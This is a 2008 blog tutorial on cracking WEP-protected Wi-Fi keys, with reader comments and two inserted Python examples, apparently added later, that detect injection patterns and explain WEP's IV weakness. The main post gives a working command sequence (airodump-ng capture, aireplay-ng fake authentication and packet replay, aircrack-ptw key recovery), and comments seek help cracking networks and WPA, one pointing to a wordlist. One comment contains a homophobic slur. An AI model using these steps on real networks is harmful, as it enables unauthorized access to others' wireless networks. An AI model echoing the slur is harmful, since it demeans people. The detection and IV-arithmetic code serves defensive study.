Hacking Wireless Keys – WEP

by Lalit Kapoor on April 21, 2008

Disclaimer: This is for Educational purposes only. I am not responsible for how you or anyone else uses the following information. Check the laws in your country.

In order to hack a wireless network secured with WEP you will need a few tools:

  • A wireless card that can go into monitor mode (I have an Intel PRO/Wireless 3945ABG)
    • Note: To dump data and crack the key in Windows I would recommend OmniPeek Personal to capture the data (it puts your driver into monitor mode and restores it when you close the application), together with the driver in the note below.
    • Note: For my wireless card I needed an older driver, which supports the much-needed monitor mode. If you need this driver I have hosted it here. This is for Windows. However, this tutorial will teach you how to crack it in Linux via a Live CD.
  • A Linux live CD (I used WifiWay version 1.0 Beta2 from here)
    • After booting up, type: startx
      • Note: All the text will be in Spanish. Go to the KDE menu and change the regional/language settings to English if you need to. Also, in the taskbar at the bottom right, change the flag from Spain's flag to the U.S. flag if you want to be able to use the US keyboard properly in the terminal.
  • airodump-ng – to dump the packets to a file
  • aireplay-ng – to increase the number of data packets
  • aircrack-ptw – to crack the key

Now that you have all these tools, do the following (assuming you are using the WifiWay CD):

  1. Type in a terminal: airodump-ng rtap0
  2. Type in another terminal: airodump-ng -w packets rtap0 to start dumping the packets
  3. Type in another terminal: ifconfig wifi0 up
  4. Type: ifconfig to get our MAC address
  5. Type in another terminal: aireplay-ng -1 0 -a BSSID -h Our MAC -e ESSID wifi0 (this is to do a handshake)
  6. Type: aireplay-ng -3 -b BSSID -e ESSID -h Our MAC wifi0 (this is to inject more traffic and drive up the number of packets)
  7. Once you have a lot of packets (over 250,000 is recommended for the longest possible WEP key), type in: aircrack-ptw packets.cap
  8. Voila, you have the key. It is in hex format.
  9. If you need to do a hex to ASCII conversion you can do it here.
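Steps 5 and 6 leave a footprint that the owner of the network can watch for: step 5 repeats open-system authentication requests from one station (the commenter "Help" below quotes the "sending authentication request (open system)" loop), and step 6 re-sends a single captured frame again and again, so the injected data frames from that station all have the same length. The script below is an added example, not code from this post or from the aircrack-ng project, that flags both patterns in frame metadata. The frame records, MAC addresses, thresholds and time window are constructed for the example; in practice the records would come from a monitor-mode capture or a wireless IDS export (an assumption about the deployment, not something the post describes).

```python
"""Flag two 802.11 injection patterns in frame metadata.

Added example for this page, not the author's code. Each frame record is
(timestamp_s, source_mac, bssid, frame_kind, payload_len); the sample set
built by build_sample() is constructed by hand.
"""
from collections import defaultdict

WINDOW_S = 10.0          # sliding window length in seconds (assumed tuning value)
AUTH_THRESHOLD = 5       # auth requests from one station to one BSSID per window
REPLAY_THRESHOLD = 200   # same-length data frames from one station per window


def _windowed_max(times, window):
    """Largest number of events that fall inside any `window`-second span."""
    times = sorted(times)
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_injection(frames, window=WINDOW_S,
                     auth_threshold=AUTH_THRESHOLD,
                     replay_threshold=REPLAY_THRESHOLD):
    """Return alerts for repeated authentication requests and replayed same-length data bursts."""
    auth_times = defaultdict(list)   # (src, bssid) -> timestamps of auth requests
    data_times = defaultdict(list)   # (src, bssid, length) -> timestamps of data frames
    for t, src, bssid, kind, length in frames:
        if kind == "auth_req":
            auth_times[(src, bssid)].append(t)
        elif kind == "data":
            data_times[(src, bssid, length)].append(t)

    alerts = []
    # Rule 1: a station re-authenticating over and over (step 5 of the write-up).
    for (src, bssid), ts in auth_times.items():
        n = _windowed_max(ts, window)
        if n >= auth_threshold:
            alerts.append({"rule": "auth_flood", "src": src, "bssid": bssid, "count": n})
    # Rule 2: a burst of identical-length data frames, the signature of one
    # captured frame being re-injected (step 6 of the write-up).
    for (src, bssid, length), ts in data_times.items():
        n = _windowed_max(ts, window)
        if n >= replay_threshold:
            alerts.append({"rule": "replay_burst", "src": src, "bssid": bssid,
                           "length": length, "count": n})
    return alerts


def build_sample():
    """Constructed frame records: one ordinary client, then one injecting station."""
    ap = "AA:BB:CC:DD:EE:FF"                       # constructed BSSID
    client, injector = "DE:AD:BE:EF:00:01", "00:11:22:33:44:55"  # constructed MACs
    frames = [(0.0, client, ap, "auth_req", 30)]   # one normal authentication
    for i in range(50):                            # varied-length normal traffic
        frames.append((1.0 + i * 0.5, client, ap, "data", 100 + (i * 37) % 900))
    for i in range(8):                             # repeated auth requests, one per second
        frames.append((5.0 + i, injector, ap, "auth_req", 30))
    for i in range(300):                           # 300 same-length frames in ~6 seconds
        frames.append((20.0 + i * 0.02, injector, ap, "data", 68))
    return frames


if __name__ == "__main__":
    for alert in detect_injection(build_sample()):
        print(alert)
```

The thresholds are deliberately loose: a legitimate client that roams or reconnects a handful of times in ten seconds stays below the authentication rule, and normal traffic mixes frame sizes, so only a sustained stream of identical-length frames from one station trips the replay rule.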

Note: If you want to crack WPA, the procedure is the same, except that when you crack it you will need to use a dictionary attack. If anyone really wants me to walk through this I will; just leave a comment.
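Why step 7 needs so many packets, and why the WPA note above describes a different problem, comes down to key layout. A WEP key is a 40-bit or 104-bit secret (marketed as "64-bit" and "128-bit") plus a 24-bit initialization vector sent in the clear with every frame, and the tools above recover the key statistically from the IVs they collect, so the attacker's leverage grows with the packet count. The 24-bit IV space also repeats quickly on a busy network, whereas WPA's TKIP and WPA2's CCMP use 48-bit per-packet counters, which is why the note falls back to guessing the passphrase instead. The following is an added example, not the author's code, that classifies a recovered key as the tools print it (10 or 26 hex digits, optionally colon-separated) and works the IV arithmetic through; the key string and the frame rates are constructed values.

```python
"""WEP key layout and IV-space arithmetic.

Added example for this page, not the author's code. The 24-bit IV and the
40/104-bit secret sizes are the standard WEP parameters; the sample key and
the frame rates used below are constructed for the example.
"""
import math

IV_BITS = 24                        # cleartext IV prepended to every WEP frame
SECRET_BITS = {10: 40, 26: 104}     # hex-digit count of a key -> secret key bits
COUNTER_BITS_TKIP_CCMP = 48         # per-packet counter size in WPA/WPA2


def wep_key_info(hexkey):
    """Classify a WEP key given as hex (colon separators allowed).

    Returns the marketed size, the secret size, and the key as ASCII when every
    byte is printable (the "hex to ASCII" step of the write-up), else None.
    """
    digits = hexkey.replace(":", "").strip()
    if len(digits) not in SECRET_BITS or any(c not in "0123456789abcdefABCDEF" for c in digits):
        raise ValueError("WEP keys are 10 or 26 hex digits")
    secret = SECRET_BITS[len(digits)]
    raw = bytes.fromhex(digits)
    ascii_form = raw.decode("ascii") if all(32 <= b < 127 for b in raw) else None
    return {"marketed_bits": secret + IV_BITS, "secret_bits": secret, "ascii": ascii_form}


def iv_repeat_probability(n_frames, iv_bits=IV_BITS):
    """Birthday-bound probability that at least two of n randomly chosen IVs coincide."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-n_frames * (n_frames - 1) / (2.0 * space))


def expected_iv_repeats(n_frames, iv_bits=IV_BITS):
    """Expected number of colliding IV pairs among n randomly chosen IVs."""
    return n_frames * (n_frames - 1) / (2.0 * 2 ** iv_bits)


def seconds_to_exhaust(counter_bits, frames_per_second):
    """Time until a sequential per-frame counter of the given width wraps around."""
    return 2 ** counter_bits / frames_per_second


if __name__ == "__main__":
    # Constructed key: 26 hex digits whose bytes spell an ASCII passphrase.
    print(wep_key_info("53:45:43:52:45:54:5F:4B:45:59:5F:31:31"))
    print("P(IV repeat) after 4,823 frames:", round(iv_repeat_probability(4823), 3))
    print("expected IV repeats in 250,000 frames:", round(expected_iv_repeats(250_000)))
    rate = 500  # assumed busy-network frame rate, frames per second
    print("hours for a 24-bit IV counter to wrap at", rate, "fps:",
          round(seconds_to_exhaust(IV_BITS, rate) / 3600, 1))
    print("years for a 48-bit counter to wrap at", rate, "fps:",
          round(seconds_to_exhaust(COUNTER_BITS_TKIP_CCMP, rate) / (3600 * 24 * 365)))
```

With random IVs the chance of a repeat passes one half after roughly 4,800 frames, and the 250,000 frames recommended in step 7 contain on the order of 1,860 colliding pairs; a sequential 24-bit counter wraps in about nine hours at 500 frames per second, while a 48-bit counter at the same rate takes longer than the lifetime of any access point. That is the design reason to replace WEP rather than to tune it.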

  • La Azara
    Thanks Lalit, that old driver is genius. I was about to lose my temper as the Intel 3945 didn't allow MAC spoofing; now it's back to where it belongs: hardware that performs as it is told to and is not ruled by old Intel faggots.
  • Iulian
    Hi Lalit,
    I get to the step: "Type in another terminal: aireplay-ng -1 0 -a BSSID -h Our MAC -e ESSID wifi0 this is to do a handshake", and then it gives me an error, "invalid MAC", and the MAC is good, because I verified it in my Vista system with the command getmac, and there it says that it is disconnected (in Vista). I think that in the live Linux CD my MAC is turned off. How can I make it work? I look forward to your answer! Thank you!
    Best regards, Iulian!!
  • ajith
    Hi Lalit,
    Can I get a simple step-by-step tutorial on WEP key viewing?

    Thanks
  • @violator: Try an Ubuntu live CD (8.10); it will support your driver out of the box.
  • violator
    hi. I have been trying to install 3945 drivers on Linux but it's not happening. What is a Linux live CD? Where can I download it? Any luck with hacking WEP networks in Windows?
  • @siju: Why don't you just use a Linux live CD? I've had problems getting the 3945 into promiscuous mode in Windows; let me know if you find a working Windows solution.
  • siju
    hi there... could you help me... I need to crack a WEP-secured network using Windows... I tried using airodump, but it shows no network adapter detected... I'm using an Intel PRO/Wireless 3945ABG... I even tried the driver you mentioned... still... could you give me a guide on doing it in Windows... thanks a lot...
  • @Help: it may be called packet.cap01 or something else; look for the file that just got created, that is most likely your capture file.
  • Help
    Also, when I try to do aircrack-ptw packets.cap it says could not open file.
  • Help
    I am trying to get this working on my wireless network and have not been able to succeed. I get to the part where it says "Type in another terminal: aireplay-ng -1 0 -a BSSID -h Our MAC -e ESSID wifi0 this is to do a handshake". When I type this in I get "sending authentication request (open system)" until finally it fails with "attack was unsuccessful". The first time I run it, though, after the first time it gives me the message it says "ack" next to one, and then it keeps going with the sending authentication request. I am using the same setup you are (i.e. wireless card and WifiWay 1.0 beta). I was hoping that you could help.
  • @m1hn34: for A dictionary try the all.gz file here: ftp://ftp.ibiblio.org/pub/linu...
  • m1hn34
    hello... I cracked WEP keys. Now I want to go further and crack WPA.
    The problem is that I cannot find a good dictionary... can you help me please?